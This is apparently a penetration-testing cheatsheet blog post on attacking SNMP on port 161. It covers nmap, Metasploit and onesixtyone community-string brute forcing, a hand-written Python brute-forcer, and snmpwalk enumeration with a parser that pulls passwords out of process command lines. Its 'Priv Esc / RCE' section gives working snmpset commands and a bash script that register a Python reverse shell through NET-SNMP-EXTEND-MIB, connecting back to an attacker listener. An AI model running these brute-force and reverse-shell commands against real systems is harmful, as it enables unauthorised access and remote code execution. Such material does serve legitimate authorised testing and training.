SNMP Pentest Cheatsheet - Port 161


Basic info About SNMP

Ports - 161/udp (agent, queried by managers), 162/udp (traps sent to the manager), 10161 and 10162/udp (SNMP over TLS/DTLS)

SNMP runs over UDP and is stateless, so v1/v2c requests can be sent from a forged source address and captured packets can be replayed.
SNMPv1, SNMPv2 and SNMPv2c send the community string in cleartext, so anyone who can sniff the local network segment can read it; only SNMPv3 adds authentication and encryption.

Because SNMP is UDP, a scanner only gets an answer when it sends a well-formed SNMP request to the right port with a community string the agent accepts; anything else is silently dropped.
That is why nmap reports udp/161 as open|filtered until a probe draws a reply, and why you need a valid community string before any enumeration works.

When a response does come back it carries the community string that was used, so a scanner that sprays candidates (onesixtyone, nmap snmp-brute) learns which strings the agent accepts. MIB values worth pulling once you have one:
System processes
Running programs
Process paths
Storage units
Installed software and hotfixes
TCP local ports
System description

OID and MIB Hierarchy
OID and MIB Hierarchy - the way MIB values are addressed. Every value lives at an OID, a dotted numeric path in one global tree (1.3.6.1.2.1.1.1.0 is sysDescr.0 under iso.org.dod.internet.mgmt.mib-2.system); a MIB file maps names onto those numbers, which is why snmpwalk prints raw iso.3.6.1... paths until the MIBs are installed.

Enum via NMAP

#Run SNMP Nmap Scripts
nmap -sCUV -p161 --script=snmp-info,snmp-interfaces,snmp-netstat,snmp-sysdescr,snmp-processes,snmp-win32-software <IP>

#Brute forcing community strings
nmap -sUCV -Pn -p 161 --script snmp-brute --script-args snmp-brute.communitiesdb=/usr/share/wordlists/SecLists/Discovery/SNMP/common-snmp-community-strings.txt <IP>

#Run all scripts related to snmp
nmap -sU -p 161 --script snmp-* -Pn <IP>

#Metasploit: general enumeration
use auxiliary/scanner/snmp/snmp_enum
set RHOSTS <IP>
run

#Find SNMP Shares (Windows hosts)
use auxiliary/scanner/snmp/snmp_enumshares
set RHOSTS <IP>
run

#Brute force community strings (PASS_FILE holds the candidate communities)
use auxiliary/scanner/snmp/snmp_login
set RHOSTS <IP>
set PASS_FILE /usr/share/wordlists/rockyou.txt
run

Enum via SNMPENUM Script
git clone
#Usage: target, community string, then the config file for the platform (linux.txt, windows.txt, ...)
perl snmpenum.pl <IP> public linux.txt
Enumeration using OneSixtyOne

#Build a target list (one IP per line), either with a shell loop or with prips
for ip in $(seq 100 254); do echo 192.168.31.$ip; done > ips.txt
prips <first-IP> <last-IP> > targets.txt
#Sample community wordlist: /usr/share/wordlists/SecLists/Discovery/SNMP/common-snmp-community-strings.txt

#brute force community strings against IP Addresses
onesixtyone -c community_strings.txt -i ips.txt

#multiple communities against a single host
onesixtyone -c community_strings.txt <IP>

#Multiple Targets against a single Community string
onesixtyone -i ips.txt public
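The exchange behind onesixtyone and nmap snmp-brute, as an added example that is not from this cheatsheet or from either tool: it BER-encodes an SNMPv1/v2c GetRequest for sysDescr.0 by hand, decodes the GetResponse (whose cleartext community field is what the scanner reads back), and loops a community list against one host, treating UDP silence as a miss. The host 192.0.2.10 and the community list are assumptions; the `send` parameter is injectable so the loop can be exercised offline against a stub agent.

```python
# Added example: hand-built SNMPv1/v2c GetRequest + community brute force (not from the cheatsheet).
# Host 192.0.2.10 and the community list are assumptions; `send` is injectable so it runs offline.
import socket
from typing import Callable, Dict, List, Optional, Tuple

SYS_DESCR = "1.3.6.1.2.1.1.1.0"  # sysDescr.0: the object scanners request to test a community

def _ber_len(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body  # long form: count byte, then the length itself

def _tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _ber_len(len(body)) + body

def _ber_int(v: int) -> bytes:  # non-negative INTEGER in shortest two's-complement form
    return _tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True))

def _ber_oid(oid: str) -> bytes:
    arcs = [int(a) for a in oid.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])  # first two arcs share one byte
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        while arc >> 7:  # base-128, continuation bit on every byte but the last
            arc >>= 7
            chunk.append(0x80 | (arc & 0x7F))
        out.extend(reversed(chunk))
    return _tlv(0x06, bytes(out))

def _read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def _decode_oid(body: bytes) -> str:
    arcs, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))

def _message(community: str, pdu_tag: int, request_id: int, varbinds: bytes, version: int) -> bytes:
    # version 0 = SNMPv1, 1 = SNMPv2c; PDU = request-id, error-status, error-index, varbind list
    pdu = _tlv(pdu_tag, _ber_int(request_id) + _ber_int(0) + _ber_int(0) + _tlv(0x30, varbinds))
    return _tlv(0x30, _ber_int(version) + _tlv(0x04, community.encode()) + pdu)

def build_get_request(community: str, oid: str = SYS_DESCR, request_id: int = 1, version: int = 1) -> bytes:
    """GetRequest (0xA0) for one OID; the value slot is NULL until the agent fills it."""
    return _message(community, 0xA0, request_id, _tlv(0x30, _ber_oid(oid) + _tlv(0x05, b"")), version)

def build_get_response(community: str, oid: str, value: bytes, request_id: int = 1, version: int = 1) -> bytes:
    """GetResponse (0xA2) carrying an OCTET STRING; used to construct agent replies offline."""
    return _message(community, 0xA2, request_id, _tlv(0x30, _ber_oid(oid) + _tlv(0x04, value)), version)

def parse_message(msg: bytes) -> Dict:
    """Decode a v1/v2c message: the community string is cleartext, right after the version."""
    _, body, _ = _read_tlv(msg, 0)
    _, ver, pos = _read_tlv(body, 0)
    _, comm, pos = _read_tlv(body, pos)
    pdu_tag, pdu, _ = _read_tlv(body, pos)
    _, rid, p = _read_tlv(pdu, 0)
    _, err, p = _read_tlv(pdu, p)
    _, _idx, p = _read_tlv(pdu, p)
    _, vbl, _ = _read_tlv(pdu, p)
    varbinds, q = [], 0
    while q < len(vbl):
        _, vb, q = _read_tlv(vbl, q)
        _, oid_body, r = _read_tlv(vb, 0)
        vtag, val, _ = _read_tlv(vb, r)
        varbinds.append((_decode_oid(oid_body), vtag, val))
    as_int = lambda b: int.from_bytes(b, "big", signed=True)
    return {"version": as_int(ver), "community": comm.decode(errors="replace"), "pdu_tag": pdu_tag,
            "request_id": as_int(rid), "error_status": as_int(err), "varbinds": varbinds}

def udp_probe(host: str, payload: bytes, timeout: float = 1.0) -> Optional[bytes]:
    """One datagram to udp/161. A rejected community gets no reply at all, hence the timeout."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(payload, (host, 161))
        try:
            return sock.recvfrom(65535)[0]
        except socket.timeout:
            return None

def brute_force(host: str, communities: List[str],
                send: Callable[[str, bytes], Optional[bytes]] = udp_probe) -> List[Tuple[str, str]]:
    """(community, sysDescr) for every string the agent answers with a clean GetResponse."""
    hits = []
    for rid, community in enumerate(communities, start=1):  # unique request-id per probe
        reply = send(host, build_get_request(community, request_id=rid))
        if reply is None:
            continue
        got = parse_message(reply)
        if got["pdu_tag"] == 0xA2 and got["request_id"] == rid and got["error_status"] == 0:
            hits.append((got["community"], got["varbinds"][0][2].decode(errors="replace")))
    return hits

if __name__ == "__main__":
    print(brute_force("192.0.2.10", ["public", "private", "manager"]))  # lab host: assumed address
```

Each probe carries its own request-id and a hit is only counted when the reply's id matches, so a late reply from an earlier community is never credited to the wrong string; the same check is what keeps the tools from reporting false positives on lossy links.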
Enum Using snmpwalk

#-v 2c = SNMP version 2c, -c = community string; with no OID the walk starts at mib-2
snmpwalk -c public -v 2c <IP>
snmpwalk -c pr1v@te -v 2c <IP>

#-v1 = SNMP version 1, -c = community string (public)
snmpwalk -c public -v1 <IP>

#Get Running Processes (HOST-RESOURCES-MIB hrSWRunName; hrSWRunPath and hrSWRunParameters give the path and the command line)
snmpwalk -c public -v1 <IP> HOST-RESOURCES-MIB::hrSWRunName

#Get Open TCP Ports (entries with tcpConnState = listen(2) are listening sockets)
snmpwalk -c public -v1 <IP> TCP-MIB::tcpConnState

#SNMP Extended List: install the MIBs so snmpwalk prints names instead of raw OIDs
sudo apt-get install snmp-mibs-downloader
sudo download-mibs
sudo nano /etc/snmp/snmp.conf
mibs +ALL #Add NEW MIBS (replace the default "mibs :" line in snmp.conf with this)
snmpwalk -v 2c -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
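Turning snmpwalk output into something usable, as an added example that is not part of the cheatsheet: it normalises the three OID spellings Net-SNMP prints (iso.3.6..., .1.3.6... and MIB::name.index), rebuilds the process table from hrSWRunName/hrSWRunPath/hrSWRunParameters, lists sockets whose tcpConnState is listen(2), and flags command lines that carry a password argument, since hrSWRunParameters exposes the full command line of every process. The walk lines inside the block are constructed to look like real output; the OIDs are the standard HOST-RESOURCES-MIB and TCP-MIB numbers.

```python
# Added example: parse snmpwalk output into processes and listening ports. Not from the
# cheatsheet; SAMPLE_WALK below is constructed, the OIDs are the standard MIB assignments.
import re
from typing import Dict, List, Tuple

HR_SW_RUN_NAME = "1.3.6.1.2.1.25.4.2.1.2"  # hrSWRunName.<pid>
HR_SW_RUN_PATH = "1.3.6.1.2.1.25.4.2.1.4"  # hrSWRunPath.<pid>
HR_SW_RUN_ARGS = "1.3.6.1.2.1.25.4.2.1.5"  # hrSWRunParameters.<pid>
TCP_CONN_STATE = "1.3.6.1.2.1.6.13.1.1"    # tcpConnState.<laddr>.<lport>.<raddr>.<rport>
TCP_LISTEN = 2
SYMBOLIC = {"hrSWRunName": HR_SW_RUN_NAME, "hrSWRunPath": HR_SW_RUN_PATH,
            "hrSWRunParameters": HR_SW_RUN_ARGS, "tcpConnState": TCP_CONN_STATE}

LINE = re.compile(r"^(?P<oid>\S+)\s*=\s*(?P<type>[A-Za-z0-9-]+):\s?(?P<value>.*)$")
CRED_HINT = re.compile(r"(?i)(^|\s)(-p\S+|--password\S*|pass(word)?=\S+)")

SAMPLE_WALK = """\
iso.3.6.1.2.1.25.4.2.1.2.1 = STRING: "systemd"
iso.3.6.1.2.1.25.4.2.1.2.842 = STRING: "sshd"
iso.3.6.1.2.1.25.4.2.1.2.1207 = STRING: "mysqld"
iso.3.6.1.2.1.25.4.2.1.2.1500 = STRING: "mysql"
iso.3.6.1.2.1.25.4.2.1.4.1207 = STRING: "/usr/sbin/mysqld"
iso.3.6.1.2.1.25.4.2.1.5.1207 = STRING: "--defaults-file=/etc/mysql/my.cnf"
iso.3.6.1.2.1.25.4.2.1.5.1500 = STRING: "-u root -pS3cret!"
iso.3.6.1.2.1.6.13.1.1.0.0.0.0.22.0.0.0.0.0 = INTEGER: 2
iso.3.6.1.2.1.6.13.1.1.127.0.0.1.3306.0.0.0.0.0 = INTEGER: 2
iso.3.6.1.2.1.6.13.1.1.10.0.0.2.22.10.0.0.9.51234 = INTEGER: 5
HOST-RESOURCES-MIB::hrSWRunName.2048 = STRING: "python3"
TCP-MIB::tcpConnState.0.0.0.0.8080.0.0.0.0.0 = INTEGER: listen(2)
"""

def normalise_oid(oid: str) -> str:
    """'iso.3.6...', '.1.3.6...' and 'MIB::name.index' all become plain dotted numbers."""
    if "::" in oid:
        name, _, index = oid.split("::", 1)[1].partition(".")
        return SYMBOLIC[name] + ("." + index if index else "")
    if oid.startswith("iso."):
        oid = "1." + oid[4:]
    return oid.lstrip(".")

def parse_walk(lines) -> List[Tuple[str, str, str]]:
    out = []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # continuation lines of multi-line STRING values are not handled here
        value = m.group("value")
        if m.group("type") == "STRING":
            value = value.strip('"')
        elif m.group("type") == "INTEGER":
            value = re.search(r"-?\d+", value).group()  # 'listen(2)' and '2' both give '2'
        out.append((normalise_oid(m.group("oid")), m.group("type"), value))
    return out

def inventory(lines) -> Dict:
    procs: Dict[int, Dict[str, str]] = {}
    listening: List[Tuple[str, int]] = []
    for oid, _, value in parse_walk(lines):
        for prefix, field in ((HR_SW_RUN_NAME, "name"), (HR_SW_RUN_PATH, "path"), (HR_SW_RUN_ARGS, "args")):
            if oid.startswith(prefix + "."):
                pid = int(oid[len(prefix) + 1:])
                procs.setdefault(pid, {"name": "", "path": "", "args": ""})[field] = value
        if oid.startswith(TCP_CONN_STATE + ".") and int(value) == TCP_LISTEN:
            idx = oid[len(TCP_CONN_STATE) + 1:].split(".")  # 4 octets local addr, then local port
            listening.append((".".join(idx[:4]), int(idx[4])))
    return {"processes": procs, "listening": listening}

def credential_hints(inv: Dict) -> List[Tuple[int, str, str]]:
    """hrSWRunParameters is the full command line, so password arguments leak to any reader."""
    return [(pid, p["name"], p["args"]) for pid, p in sorted(inv["processes"].items())
            if CRED_HINT.search(p["args"])]

if __name__ == "__main__":
    inv = inventory(SAMPLE_WALK.splitlines())
    print(inv["listening"])
    print(credential_hints(inv))
```

Feed it the saved output of either the numeric walk or the MIB-resolved one; both spellings land on the same keys, so the process table and the listening list are identical whichever form the target's snmpwalk produced.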
Enum using snmpbulkwalk

#GetBulk only exists from SNMPv2c onwards, so -v 1 will not work here; on big tables it is far faster than snmpwalk
snmpbulkwalk -c [COMM_STRING] -v [VERSION] [IP] .
snmpbulkwalk -c public -v2c [IP] .
Enum Using SNMPCheck

#Basic Syntax (-t target, -c community; the Kali package installs the binary as snmp-check)
snmpcheck -t <IP> -c public
Priv Esc / RCE when snmpd.conf grants a rwcommunity string
A community with write access (rwcommunity in snmpd.conf) can create entries in NET-SNMP-EXTEND-MIB; snmpd then runs the configured program, with the privileges of the snmpd process, every time the extension's output objects are read. Install the MIBs first so the object names resolve:

sudo apt-get install snmp-mibs-downloader
sudo download-mibs
sudo nano /etc/snmp/snmp.conf
mibs +ALL #Add NEW MIBS

#Create the extend entry (PASSWORD is the write community, KALI_IP/PORT your listener)
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c PASSWORD <IP> 'nsExtendStatus."evilcommand"' = createAndGo 'nsExtendCommand."evilcommand"' = /usr/bin/python3 'nsExtendArgs."evilcommand"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"KALI_IP\",PORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'

#Trigger it: reading the extension's output objects makes snmpd execute the command
snmpwalk -v 2c -c PASSWORD <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull

Automating the task with a bash script (the snmpset and the triggering snmpwalk together; set the listener host inside s.connect before running):

#!/bin/bash
random="holyshit"
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c PASSWORD <IP> \
  "nsExtendStatus.\"${random}\"" = createAndGo \
  "nsExtendCommand.\"${random}\"" = /usr/bin/python3 \
  "nsExtendArgs.\"${random}\"" = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"\",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'
snmpwalk -v 2c -c PASSWORD <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
Access SNMP Service via Python

from pysnmp.hlapi import *

target_host = ''
community_string = 'public'  # Replace with the actual community string
oid_to_get = ''  # Example OID for system description

# Perform SNMP GET operation (mpModel=1 selects SNMPv2c; 0 would be SNMPv1)
errorIndication, errorStatus, errorIndex, varBinds = next(
    getCmd(SnmpEngine(),
           CommunityData(community_string, mpModel=1),
           UdpTransportTarget((target_host, 161)),
           ContextData(),
           ObjectType(ObjectIdentity(oid_to_get)))
)

# Check for errors: errorIndication is a transport/engine failure (e.g. a timeout, which is
# all you get for a wrong community), errorStatus is an error the agent put in its GetResponse
if errorIndication:
    print(errorIndication)
elif errorStatus:
    print('%s at %s' % (errorStatus.prettyPrint(),
                        errorIndex and varBinds[int(errorIndex) - 1][0] or '?'))
else:
    for varBind in varBinds:
        print(' = '.join([x.prettyPrint() for x in varBind]))

Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.
